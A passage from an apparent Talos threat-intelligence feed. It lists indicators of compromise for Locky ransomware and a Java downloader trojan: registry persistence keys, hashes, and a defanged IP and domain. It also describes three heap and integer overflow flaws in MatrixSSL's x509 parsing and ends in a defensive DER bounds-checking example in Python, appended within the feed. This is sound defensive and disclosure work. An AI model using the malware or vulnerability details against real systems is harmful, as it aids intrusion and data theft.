Keys&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;.*\loptr-5e5a.htm&lt;/li&gt;&lt;li&gt;&amp;lt;GUID&amp;gt;.loptr&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;091141f6b67540ba8848f1b081ad40d5f6d8172c878d40046f82ab0234acf3db&lt;/li&gt;&lt;li&gt;7f4777245025c96d936d14b3b4a718be35ced59558f090e1197adfca5d9573b2&lt;/li&gt;&lt;li&gt;26074772fa68db08f463c66deeabe064bcd9d48032430bbbdf27ffdf8967e8c5&lt;/li&gt;&lt;li&gt;85fa592bf685966d8da1cf72f2c6c092b40664de9c17d9cc4894f8f08e06f567&lt;/li&gt;&lt;li&gt;49184047c840287909cf0e6a5e00273c6d60da1750655ad66e219426b3cf9cd8&lt;/li&gt;&lt;li&gt;e7b8d8e3c19b6b3cc4a6eafced463f08176330fe243d8a9fcd20aedc5af17806&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-2HLUs8r-6l8/WU1xB7HvpgI/AAAAAAAABIU/j5ojA5N6nd4sy-CPdo1pcjF4RIJH5YwrwCLcBGAs/s1600/Win_Ransomware_Locky_6330799_0_amp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" 
data-original-height="245" data-original-width="359" height="272" src="https://4.bp.blogspot.com/-2HLUs8r-6l8/WU1xB7HvpgI/AAAAAAAABIU/j5ojA5N6nd4sy-CPdo1pcjF4RIJH5YwrwCLcBGAs/s400/Win_Ransomware_Locky_6330799_0_amp.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-xdgtcCNR2QE/WU1xrVz7HHI/AAAAAAAABIw/VUw5UZWatIgkoGklrhVTn7KLodU8S_pXQCLcBGAs/s1600/Win_Ransomware_Locky_6330799_0_threatgrid.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="433" data-original-width="1233" height="140" src="https://2.bp.blogspot.com/-xdgtcCNR2QE/WU1xrVz7HHI/AAAAAAAABIw/VUw5UZWatIgkoGklrhVTn7KLodU8S_pXQCLcBGAs/s400/Win_Ransomware_Locky_6330799_0_threatgrid.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-h9t6YsqcgQU/WU1xnyQ8OtI/AAAAAAAABIs/khql1v47zpEaA404VqCbK2pbEvVGGNBfQCLcBGAs/s1600/Win_Ransomware_Locky_6330799_0_malware.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="630" data-original-width="944" height="266" src="https://3.bp.blogspot.com/-h9t6YsqcgQU/WU1xnyQ8OtI/AAAAAAAABIs/khql1v47zpEaA404VqCbK2pbEvVGGNBfQCLcBGAs/s400/Win_Ransomware_Locky_6330799_0_malware.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br 
/&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.DownloaderJava-6330457-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;internat.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;miZPeWpyLHr&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\SystemCertificates\My&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\Microsoft\SystemCertificates\TrustedPublisher&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\Windows Script Host\Settings&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\WOW6432NODE\Microsoft&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\SystemCertificates\TrustedPublisher&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\Microsoft\EnterpriseCertificates\TrustedPublisher&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\System\CurrentControlSet\Services\Tcpip\Parameters&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Root&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CTLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\CA&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SystemCertificat
es&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TrustedPeople&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\SystemCertificates\trust&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\DISALLOWED\CTLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\SystemCertificates\Disallowed&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Disallowed&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Policies\Microsoft\SystemCertificates\CA&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TrustedPublisher&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;A&amp;gt;\{C108F07B-312C-11E7-8D90-00501E3AE7B5}\DEFAULTOBJECTSTORE\LruList&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\Control\DeviceClasses&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\Control\CoDeviceInstallers&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\Root&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;
gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CTLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Microsoft\SystemCertificates\TrustedPeople&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;A&amp;gt;\{C108F07B-312C-11E7-8D90-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\A93\Indexes&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\WOW6432NODE\Policies&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Fax\PrinterDriverData&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N11463_-4521624950585898-1497978066453&lt;/li&gt;&lt;li&gt;Local\__DDrawExclMode__&lt;/li&gt;&lt;li&gt;Local\__DDrawCheckExclMode__&lt;/li&gt;&lt;li&gt;RasPbFile&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;149[.]210[.]145[.]237&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;nup[.]pw&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;%AppData%\.qjava\Java\lib\jfr.jar&lt;/li&gt;&lt;li&gt;%AppData%\.qjava\Java\lib\rt.jar&lt;/li&gt;&lt;li&gt;%AppData%\.qjava\Java\lib\jfr\default.jfc&lt;/li&gt;&lt;li&gt;%AppData%\1497978066454.jar&lt;/li&gt;&lt;li&gt;%AppData%\.qjava\Java\lib\javafx.properties&lt;/li&gt;&lt;li&gt;%AppData%\.q7z.exe&lt;/li&gt;&lt;li&gt;%TEMP%\_0.15066600419658372851713423405977803.class&lt;/li&gt;&lt;li&gt;%WinDir%\Temp\FXSTIFFDebugLogFile.txt&lt;/li&gt;&lt;li&gt;\Users\Administrator\UlBrZNAMJSJ\iMCImxZnYcm.KwyVDG&lt;/li&gt;&lt;li&gt;%TEMP%\tmpA3A6.8e4d0709-e282-42fd-a717-9d512ecd2cb0.7z&lt;/li&gt;&lt;li&gt;%TEMP%\_0.32579030377917368405753216876059627.class&lt;/li&gt;&lt;li&gt;\TEMP\c9bd2f466d2c1500af5414f03f7d5c908cafdd602c23a8136cf82054233f7791.exe&lt;/li&gt;&lt;li&gt;%TEMP%\Windows7851854962857713622.dll&lt;/li&gt;&lt;li&gt;\Users\Administrator\fUTkALeaTxM\ID.txt&lt;/li&gt;&lt;li&gt;%AppData%\Oracle\lib\fontconfig.properties.src&lt;/li&gt;&lt;li&gt;%AppData%\.qjava\Java\lib\ext\cldrdata.jar&lt;/li&gt;&lt;li&gt;%TEMP%\tmpA3A6.tmp&lt;/li&gt;&lt;li&gt;\Users\Administrator\UlBrZNAMJSJ\ID.txt&lt;/li&gt;&lt;li&gt;%AppData%\Oracle\lib\jfr\profile.jfc&lt;/li&gt;&lt;li&gt;%TEMP%\tmpA395.tmp&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;c9bd2f466d2c1500af5414f03f7d5c908cafdd602c23a8136cf82054233f7791&lt;/li&gt;&lt;li&gt;a49fb3f2f4a8e5d996b49d51eae11ec11dca3a1aa2db319ed004d898c4484bf2&lt;/li&gt;&lt;li&gt;b0f8ca0c55a07bc4a9a12ee6dade6843aa9ca875ebd082759b2a85727fe64f83&lt;/li&gt;&lt;li&gt;26c487810b80460a69711463dc3ffaa8d0ca6cc21dbf2856660fc1ceed23af53&lt;/li&gt;&lt;li&gt;555bdc43352d19ed64b7580206208462bfd3be9038bcb92c0898d2861f995c4b&lt;/li&gt;&lt;li&gt;3977f37224326f7508ed5f086fc4161d2f8d2aacff62f7c05d29243a8f401fa8&lt;/li&gt;&lt;li&gt;a84eef3d331514764cb72146a376f61e3cf2189fa7d2f81d1a7e99b41fafaedf&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-W4C4KZIfGgs/WU1xZAqdcEI/AAAAAAAABIg/EHVNfaaWioIXYkQSjwWWC84H0nYA2xqawCLcBGAs/s1600/Win_Trojan_DownloaderJava_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="420" data-original-width="618" height="271" src="https://1.bp.blogspot.com/-W4C4KZIfGgs/WU1xZAqdcEI/AAAAAAAABIg/EHVNfaaWioIXYkQSjwWWC84H0nYA2xqawCLcBGAs/s400/Win_Trojan_DownloaderJava_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-0fzhey3GEKQ/WU1xcvojIcI/AAAAAAAABIk/CgLvDVvnlZQa_SfFsVPCP4OoJSOkhwPsACLcBGAs/s1600/Win_Trojan_DownloaderJava_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="611" data-original-width="1600" height="152" src="https://3.bp.blogspot.com/-0fzhey3GEKQ/WU1xcvojIcI/AAAAAAAABIk/CgLvDVvnlZQa_SfFsVPCP4OoJSOkhwPsACLcBGAs/s400/Win_Trojan_DownloaderJava_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: 
center;"&gt;&lt;a href="https://2.bp.blogspot.com/-QTHMm9gpHY4/WU1xi_rVWaI/AAAAAAAABIo/xq00p_JUUYwl3g-LKu5jgt6PkEhyCtgCwCLcBGAs/s1600/Win_Trojan_DownloaderJava_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="774" data-original-width="1600" height="192" src="https://2.bp.blogspot.com/-QTHMm9gpHY4/WU1xi_rVWaI/AAAAAAAABIo/xq00p_JUUYwl3g-LKu5jgt6PkEhyCtgCwCLcBGAs/s400/Win_Trojan_DownloaderJava_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=LGYCPT-CKkM:8SlKUsYwVA8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/LGYCPT-CKkM" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-23T15:55:17.426-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s72-c/no-netsec.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/threat-roundup-0616-0623.html</feedburner:origLink></item><item><title>Vulnerability Spotlight: Multiple Vulnerabilities in InsideSecure MatrixSSL</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/QAa9jYAi7gA/matrixssl-multiple-vulns.html</link><category>0-day</category><category>matrixssl</category><category>vulndev</category><category>vulnerabilities</category><author>noreply@blogger.com (Edmund Brumaghin)</author><pubDate>Thu, 22 Jun 2017 10:37:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-3086354566922561896</guid><description>&lt;i&gt;These vulnerabilities were discovered by Aleksandar Nikolic of Cisco Talos&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Overview&lt;/h2&gt;&lt;br /&gt;MatrixSSL is a TLS/SSL stack offered in the form of a Software Development Kit (SDK) that is geared towards application in Internet of Things (IOT) devices and other embedded systems. It features low resource overhead and supports many different embedded platforms. It also features FIPS 140-2 compliant cryptography making it suitable for use in high security environments. 
Talos recently discovered multiple vulnerabilities in MatrixSSL version 3.8.7b including two remote code execution (RCE) vulnerabilities as well as an information disclosure vulnerability.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h3&gt;TALOS-2017-0276: InsideSecure MatrixSSL x509 certificate SubjectDomainPolicy Remote Code Execution Vulnerability (CVE-2017-2780)&lt;/h3&gt;&lt;h3&gt;&amp;nbsp;&lt;/h3&gt;MatrixSSL is susceptible to a heap based buffer overflow due to a vulnerability in the 'parsePolicyMappings' function while parsing the x509 SubjectDomainPolicy PolicyMappings extension. When parsing x509 certificates in DER format, a fixed size heap allocation occurs. In situations where the received encoded OID value is longer than the amount of space that has been allocated to the heap, an overflow condition occurs. This vulnerability could be exploited by an attacker to achieve remote code execution on vulnerable systems using a specially crafted OID value.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;TALOS-2017-0277: InsideSecure MatrixSSL x509 certificate IssuerDomainPolicy Remote Code Execution Vulnerability (CVE-2017-2781)&lt;/h3&gt;&lt;h3&gt;&amp;nbsp;&lt;/h3&gt;MatrixSSL is susceptible to a heap based buffer overflow due to a vulnerability in the 'parsePolicyMappings' function while parsing the IssuerPolicy PolicyMappings extension. When parsing x509 certificates in DER format, a fixed size heap allocation occurs. In situations where the received encoded OID value is longer than the amount of space that has been allocated to the heap, an overflow condition occurs. 
This vulnerability could be exploited by an attacker to achieve remote code execution using a specially crafted OID value.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;TALOS-2017-0278: InsideSecure MatrixSSL x509 certificate General Names Information Disclosure Vulnerability (CVE-2017-2782)&lt;/h3&gt;MatrixSSL is susceptible to an integer overflow due to a vulnerability in how general names extensions are parsed by the 'parseGeneralNames' function. A specially crafted x509 certificate containing attacker-controlled subject alternative name ASN.1 strings can be used to trigger an integer overflow, which in turn can be used to leak sensitive information on affected systems.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;Talos has worked to responsibly disclose these vulnerabilities to InsideSecure. InsideSecure has released security update 3.9.3 to resolve these issues. Many of the embedded systems potentially affected by these vulnerabilities lack modern heap exploitation mitigations, which may make them easier to exploit successfully. As some of these vulnerabilities can be leveraged by an attacker to obtain remote code execution on affected systems, it is recommended that the security update be applied as quickly as possible. Ensuring that systems remain patched against the latest software vulnerabilities is essential to ensuring that environments remain protected. 
The latest version of this software package is available &lt;a href="https://github.com/matrixssl/matrixssl/releases/tag/3-9-3-open"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;For full details regarding these vulnerabilities, please see the advisories &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0276/"&gt;here&lt;/a&gt;, &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0277/"&gt;here&lt;/a&gt; and &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0278/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Research efforts to identify zero-day vulnerabilities in software will remain an ongoing effort by Talos. Our work in developing programmatic methods to identify zero-day vulnerabilities and making sure they are addressed in a responsible manner is critical to improving the overall security of the internet.&lt;br /&gt;&lt;br /&gt;Our vulnerability reporting and disclosure policy can be found &lt;a href="http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Coverage&lt;/h2&gt;&lt;h2&gt;&amp;nbsp;&lt;/h2&gt;The following Snort IDs have been released to detect these vulnerabilities: 41466, 41467 &lt;br /&gt;&lt;br /&gt;Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;For further zero day or vulnerability reports and information visit:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://talosintelligence.com/vulnerability-reports/"&gt;http://talosintelligence.com/vulnerability-reports/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
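<![CDATA[
The three advisories above share one shape: a length taken from attacker-supplied DER is trusted before it is compared with the space available. The block below is an added example written for this page, not MatrixSSL code, and it does not reproduce the parsePolicyMappings or parseGeneralNames internals. It shows, in Python for readability, the two checks a DER consumer needs: an OID's encoded length is compared with its fixed-size destination (OID_BUF_SIZE is a constructed stand-in for the fixed-size heap allocation) before anything is copied, and every length field is compared with the bytes actually remaining before the cursor advances, so length arithmetic can never run past the buffer. All sample byte strings are constructed.

```python
# Added example, not MatrixSSL code: a bounds-checked DER walker showing the
# two checks whose absence leads to the bug classes described in the post
# above (an encoded OID longer than its fixed-size destination, and a length
# field larger than the remaining input). All sample bytes are constructed.
from typing import List, Tuple

OID_BUF_SIZE = 32      # constructed stand-in for a fixed-size heap allocation
TAG_OID = 0x06
TAG_SEQUENCE = 0x30


class DerError(ValueError):
    """Raised for any length claim that is inconsistent with the input."""


def read_length(data: bytes, pos: int) -> Tuple[int, int]:
    """Decode a DER length at data[pos]; return (length, position of content).

    The claimed length is compared against the bytes actually remaining, so a
    caller can add it to pos without the cursor ever running past the buffer.
    """
    if pos >= len(data):
        raise DerError("truncated length field")
    first = data[pos]
    pos += 1
    if first < 0x80:                       # short form: the byte is the length
        length = first
    else:                                  # long form: (first & 0x7F) length bytes follow
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 8 or nbytes > len(data) - pos:
            raise DerError("malformed long-form length")
        length = int.from_bytes(data[pos:pos + nbytes], "big")
        pos += nbytes
    if length > len(data) - pos:           # the check that stops over-reads
        raise DerError("length %d exceeds %d remaining bytes" % (length, len(data) - pos))
    return length, pos


def parse_oid(data: bytes, pos: int = 0) -> Tuple[bytes, int]:
    """Parse one OID TLV whose content must fit an OID_BUF_SIZE-byte destination."""
    if pos >= len(data) or data[pos] != TAG_OID:
        raise DerError("expected OID tag")
    length, pos = read_length(data, pos + 1)
    if length > OID_BUF_SIZE:              # the missing bound: refuse rather than overflow
        raise DerError("OID of %d bytes does not fit a %d-byte buffer" % (length, OID_BUF_SIZE))
    return data[pos:pos + length], pos + length


def parse_general_names(data: bytes) -> List[Tuple[int, bytes]]:
    """Walk the TLVs of a SEQUENCE (e.g. GeneralNames) into (tag, value) pairs.

    Each element's length is validated before the cursor moves, and the cursor
    is also kept inside the SEQUENCE's own declared extent.
    """
    if not data or data[0] != TAG_SEQUENCE:
        raise DerError("expected SEQUENCE tag")
    total, pos = read_length(data, 1)
    end = pos + total
    names = []
    while pos < end:
        tag = data[pos]
        length, pos = read_length(data, pos + 1)
        if length > end - pos:
            raise DerError("element runs past the end of its SEQUENCE")
        names.append((tag, data[pos:pos + length]))
        pos += length
    return names


def is_rejected(parser, data: bytes) -> bool:
    """True when the parser refuses the input with DerError."""
    try:
        parser(data)
    except DerError:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: a well-formed OID, an OID too long for the buffer
    # (0x28 = 40 bytes), a long-form length claiming 4 GB, and a two-name SEQUENCE.
    good_oid = bytes([TAG_OID, 0x03, 0x2A, 0x03, 0x04])
    oversized_oid = bytes([TAG_OID, 0x28]) + b"\x2a" * 40
    huge_length = bytes([TAG_OID, 0x84, 0xFF, 0xFF, 0xFF, 0xFF, 0x2A])
    names = bytes([TAG_SEQUENCE, 0x0B, 0x82, 0x03]) + b"abc" + bytes([0x82, 0x04]) + b"a.io"
    print(parse_oid(good_oid))
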